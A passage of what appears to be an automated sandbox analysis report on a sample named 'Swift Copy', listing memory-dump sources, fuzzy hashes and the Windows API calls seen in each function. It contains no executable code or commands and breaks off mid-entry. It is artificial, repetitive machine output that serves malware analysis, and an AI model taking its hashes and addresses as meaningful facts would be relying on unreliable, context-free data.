                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                              • String ID:
                                              • API String ID: 3050599898-0
                                              • Opcode ID: adbe86395c86f322798b89b2cd4db9a76c588cf057678db3b0b3080f9f3d6d44
                                              • Instruction ID: 22d01d9f8551664848b1305a69dc46cd4a44b124e52b38462c33e141ed6c79d8
                                              • Opcode Fuzzy Hash: adbe86395c86f322798b89b2cd4db9a76c588cf057678db3b0b3080f9f3d6d44
                                              • Instruction Fuzzy Hash: E041B330104301AFDB11EF65DC94FBABBB8EB86720F180269FA94971E1C7719889DB71
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00DE080C
                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00DE0847
                                              • EnterCriticalSection.KERNEL32(?), ref: 00DE0863
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00DE08DC
                                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00DE08F3
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00DE0921
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                              • String ID:
                                              • API String ID: 3368777196-0
                                              • Opcode ID: b40c077fcb1ced1c026720ccc160ae7352161b95c4acdc4bbbe10fe6ddbafa16
                                              • Instruction ID: 38a3603841402cd3e1932856f62947703bad040e5ce7a5c3896e461f77ce0778
                                              • Opcode Fuzzy Hash: b40c077fcb1ced1c026720ccc160ae7352161b95c4acdc4bbbe10fe6ddbafa16
                                              • Instruction Fuzzy Hash: 8D415771900205EFDF15AF55DC85AAA7BB8FF44300F1480A5F900AA297DB71DEA4DBB0
                                              APIs
                                              • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00DCF3AB,00000000,?,?,00000000,?,00DC682C,00000004,00000000,00000000), ref: 00E0824C
                                              • EnableWindow.USER32(00000000,00000000), ref: 00E08272
                                              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00E082D1
                                              • ShowWindow.USER32(00000000,00000004), ref: 00E082E5
                                              • EnableWindow.USER32(00000000,00000001), ref: 00E0830B
                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00E0832F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Window$Show$Enable$MessageSend
                                              • String ID:
                                              • API String ID: 642888154-0
                                              • Opcode ID: 62e11c6af4d575613fba72ae4146726b561f8e250ac60e2a3a73b0a25dffb904
                                              • Instruction ID: a7e9377f2cd587d0197950609abd8f5557b514376beab5a8328bd9a599b92c8e
                                              • Opcode Fuzzy Hash: 62e11c6af4d575613fba72ae4146726b561f8e250ac60e2a3a73b0a25dffb904
                                              • Instruction Fuzzy Hash: B741DA34601644DFDF11CF15C999BE47BE0FB4A718F1822A5E6886B1F2C73258C5CB41
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 00DD4C95
                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00DD4CB2
                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00DD4CEA
                                              • _wcslen.LIBCMT ref: 00DD4D08
                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00DD4D10
                                              • _wcsstr.LIBVCRUNTIME ref: 00DD4D1A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                              • String ID:
                                              • API String ID: 72514467-0
                                              • Opcode ID: 8a4c08a2dc1ef0be356fad1a8279772e1afa35501efbe23e1a084a86ed5096aa
                                              • Instruction ID: cc617a11b6e4550193d05ae6c9283f4bc5b66b903f7fa728ddd1d17cdf42c1e2
                                              • Opcode Fuzzy Hash: 8a4c08a2dc1ef0be356fad1a8279772e1afa35501efbe23e1a084a86ed5096aa
                                              • Instruction Fuzzy Hash: B621F931204204BFEB255B39EC49E7B7B9DDF45B50F14412AF805DA291DE72DC4197B1
                                              APIs
                                                • Part of subcall function 00D73AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D73A97,?,?,00D72E7F,?,?,?,00000000), ref: 00D73AC2
                                              • _wcslen.LIBCMT ref: 00DE587B
                                              • CoInitialize.OLE32(00000000), ref: 00DE5995
                                              • CoCreateInstance.OLE32(00E0FCF8,00000000,00000001,00E0FB68,?), ref: 00DE59AE
                                              • CoUninitialize.OLE32 ref: 00DE59CC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                              • String ID: .lnk
                                              • API String ID: 3172280962-24824748
                                              • Opcode ID: 114e673fc3781b97a37278c9b1e8ec5e6a939925f40522670a9161a4b5542996
                                              • Instruction ID: 38a7f70673d3b20e284d996773314212638b5549e2aa8a2fc0c05c7384e07d75
                                              • Opcode Fuzzy Hash: 114e673fc3781b97a37278c9b1e8ec5e6a939925f40522670a9161a4b5542996
                                              • Instruction Fuzzy Hash: 6ED175716047019FC714EF26D880A2ABBE1EF89758F14895DF8899B362D731EC45CFA2
                                              APIs
                                                • Part of subcall function 00DD0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DD0FCA
                                                • Part of subcall function 00DD0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DD0FD6
                                                • Part of subcall function 00DD0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DD0FE5
                                                • Part of subcall function 00DD0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00DD0FEC
                                                • Part of subcall function 00DD0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DD1002
                                              • GetLengthSid.ADVAPI32(?,00000000,00DD1335), ref: 00DD17AE
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00DD17BA
                                              • HeapAlloc.KERNEL32(00000000), ref: 00DD17C1
                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00DD17DA
                                              • GetProcessHeap.KERNEL32(00000000,00000000,00DD1335), ref: 00DD17EE
                                              • HeapFree.KERNEL32(00000000), ref: 00DD17F5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                              • String ID:
                                              • API String ID: 3008561057-0
                                              • Opcode ID: 6b0c618052ab499b9204f7320286ee14f821732e5b385097b0f90c8a6eef7029
                                              • Instruction ID: baf8d7e0b0bbbc38d2309f2b037133dde22edb1eb5d122591e403db4d5f86228
                                              • Opcode Fuzzy Hash: 6b0c618052ab499b9204f7320286ee14f821732e5b385097b0f90c8a6eef7029
                                              • Instruction Fuzzy Hash: 90117C75601205FFDB109FA5CC49BAE7BB9FB45355F24421AF481A7220D736A988CB70
                                              APIs
                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00DD14FF
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00DD1506
                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00DD1515
                                              • CloseHandle.KERNEL32(00000004), ref: 00DD1520
                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DD154F
                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00DD1563
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                              • String ID:
                                              • API String ID: 1413079979-0
                                              • Opcode ID: 2ec65083cb95891f1e5aa5bd7dfc43f9b327c7dc7e495014d0fad7e0fcb67d0e
                                              • Instruction ID: 77cdec8754e1505c76aab9ef628399d85c5af8fd139368aa2ca22d8c953d40f4
                                              • Opcode Fuzzy Hash: 2ec65083cb95891f1e5aa5bd7dfc43f9b327c7dc7e495014d0fad7e0fcb67d0e
                                              • Instruction Fuzzy Hash: 3E114A7650020ABFDB118FA4ED49BDE7BA9EF48704F188115FA05A21A0C376CE64DB60
                                              APIs
                                              • GetLastError.KERNEL32(?,?,00D93379,00D92FE5), ref: 00D93390
                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D9339E
                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D933B7
                                              • SetLastError.KERNEL32(00000000,?,00D93379,00D92FE5), ref: 00D93409
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ErrorLastValue___vcrt_
                                              • String ID:
                                              • API String ID: 3852720340-0
                                              • Opcode ID: 726350618c2c5f11650954c331d7a2549e306487fcc37f65d51853f20e2a63e6
                                              • Instruction ID: 43ae81f2371c4542fc3c72ad8125d5c1bd25deb6f28c2edbd793fedeb26426f1
                                              • Opcode Fuzzy Hash: 726350618c2c5f11650954c331d7a2549e306487fcc37f65d51853f20e2a63e6
                                              • Instruction Fuzzy Hash: 5901243224D311BFEF2827BABC899272E94EB05779B300329F410A11F0EF128D0A5A74
                                              APIs
                                              • GetLastError.KERNEL32(?,?,00DA5686,00DB3CD6,?,00000000,?,00DA5B6A,?,?,?,?,?,00D9E6D1,?,00E38A48), ref: 00DA2D78
                                              • _free.LIBCMT ref: 00DA2DAB
                                              • _free.LIBCMT ref: 00DA2DD3
                                              • SetLastError.KERNEL32(00000000,?,?,?,?,00D9E6D1,?,00E38A48,00000010,00D74F4A,?,?,00000000,00DB3CD6), ref: 00DA2DE0
                                              • SetLastError.KERNEL32(00000000,?,?,?,?,00D9E6D1,?,00E38A48,00000010,00D74F4A,?,?,00000000,00DB3CD6), ref: 00DA2DEC
                                              • _abort.LIBCMT ref: 00DA2DF2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_free$_abort
                                              • String ID:
                                              • API String ID: 3160817290-0
                                              • Opcode ID: 3df4f85c04d7d4e65a4bdc1514c2bf267b75b4f69f417b469adef6695baaef56
                                              • Instruction ID: 2ef9aa1db82140edff1007adfe5a1eee8c52e4a448445fe4fe0d366460a2a726
                                              • Opcode Fuzzy Hash: 3df4f85c04d7d4e65a4bdc1514c2bf267b75b4f69f417b469adef6695baaef56
                                              • Instruction Fuzzy Hash: F3F049355456006BCA62273F7C0AB7B1656EFC3771B354514F424A2197EF29CC4551B1
                                              APIs
                                                • Part of subcall function 00D89639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D89693
                                                • Part of subcall function 00D89639: SelectObject.GDI32(?,00000000), ref: 00D896A2
                                                • Part of subcall function 00D89639: BeginPath.GDI32(?), ref: 00D896B9
                                                • Part of subcall function 00D89639: SelectObject.GDI32(?,00000000), ref: 00D896E2
                                              • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00E08A4E
                                              • LineTo.GDI32(?,00000003,00000000), ref: 00E08A62
                                              • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00E08A70
                                              • LineTo.GDI32(?,00000000,00000003), ref: 00E08A80
                                              • EndPath.GDI32(?), ref: 00E08A90
                                              • StrokePath.GDI32(?), ref: 00E08AA0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                              • String ID:
                                              • API String ID: 43455801-0
                                              • Opcode ID: 1abf4a3ae93d861ae98f5b50ac410724104fd565dcc933082f584a7eaa1c6228
                                              • Instruction ID: 9c4d8eec43065f7a8ce98f2d6a2648a83b4af5bc9ade09cfd93ec4f2578f3364
                                              • Opcode Fuzzy Hash: 1abf4a3ae93d861ae98f5b50ac410724104fd565dcc933082f584a7eaa1c6228
                                              • Instruction Fuzzy Hash: D9111E7600010CFFEF119F91DC88EAA7F6CEB04354F148151FA55A51A1C7729D99DFA0
                                              APIs
                                              • GetDC.USER32(00000000), ref: 00DD5218
                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00DD5229
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DD5230
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00DD5238
                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00DD524F
                                              • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00DD5261
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CapsDevice$Release
                                              • String ID:
                                              • API String ID: 1035833867-0
                                              • Opcode ID: 1a87ba0ff53b8da450aad48413652aca3019e492f06953e2edd3c76a9267a471
                                              • Instruction ID: 3517deeef6230c18a46590281504070c4c9bba0e9b6cc51d3890489ea5a1d6fd
                                              • Opcode Fuzzy Hash: 1a87ba0ff53b8da450aad48413652aca3019e492f06953e2edd3c76a9267a471
                                              • Instruction Fuzzy Hash: D2018F75A00708BFEB109BA69C49F4EBFB8EF48751F144166FA04A7280D6719808CBA0
                                              APIs
                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D71BF4
                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00D71BFC
                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D71C07
                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D71C12
                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00D71C1A
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D71C22
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Virtual
                                              • String ID:
                                              • API String ID: 4278518827-0
                                              • Opcode ID: fb948e3bd4dc8f7882a06467569511019070196d3e4cbbad260537aa08c0e2b8
                                              • Instruction ID: 186161fa0bf59cbeb20d03ec47713659ff6616aa66dd90ab51f131fefe9f299a
                                              • Opcode Fuzzy Hash: fb948e3bd4dc8f7882a06467569511019070196d3e4cbbad260537aa08c0e2b8
                                              • Instruction Fuzzy Hash: 59016CB09027597DE3008F5A8C85B52FFA8FF19754F00411B915C47941C7F5A864CBE5
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00DDEB30
                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00DDEB46
                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00DDEB55
                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DDEB64
                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DDEB6E
                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00DDEB75
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                              • String ID:
                                              • API String ID: 839392675-0
                                              • Opcode ID: 7eb2769985f4043e936c5117babcea73793d9920d0bd15b98025feb82d47b03c
                                              • Instruction ID: 3cee9620a07ceb2fef3751669f8490ef253221d04e69b85e71d5dc9f3b712c88
                                              • Opcode Fuzzy Hash: 7eb2769985f4043e936c5117babcea73793d9920d0bd15b98025feb82d47b03c
                                              • Instruction Fuzzy Hash: EBF09072101118BFE7205753AC0DEEF3A7CEFCAF11F100259F601E1090D7A21A45C6B5
                                              APIs
                                              • GetClientRect.USER32(?), ref: 00DC7452
                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 00DC7469
                                              • GetWindowDC.USER32(?), ref: 00DC7475
                                              • GetPixel.GDI32(00000000,?,?), ref: 00DC7484
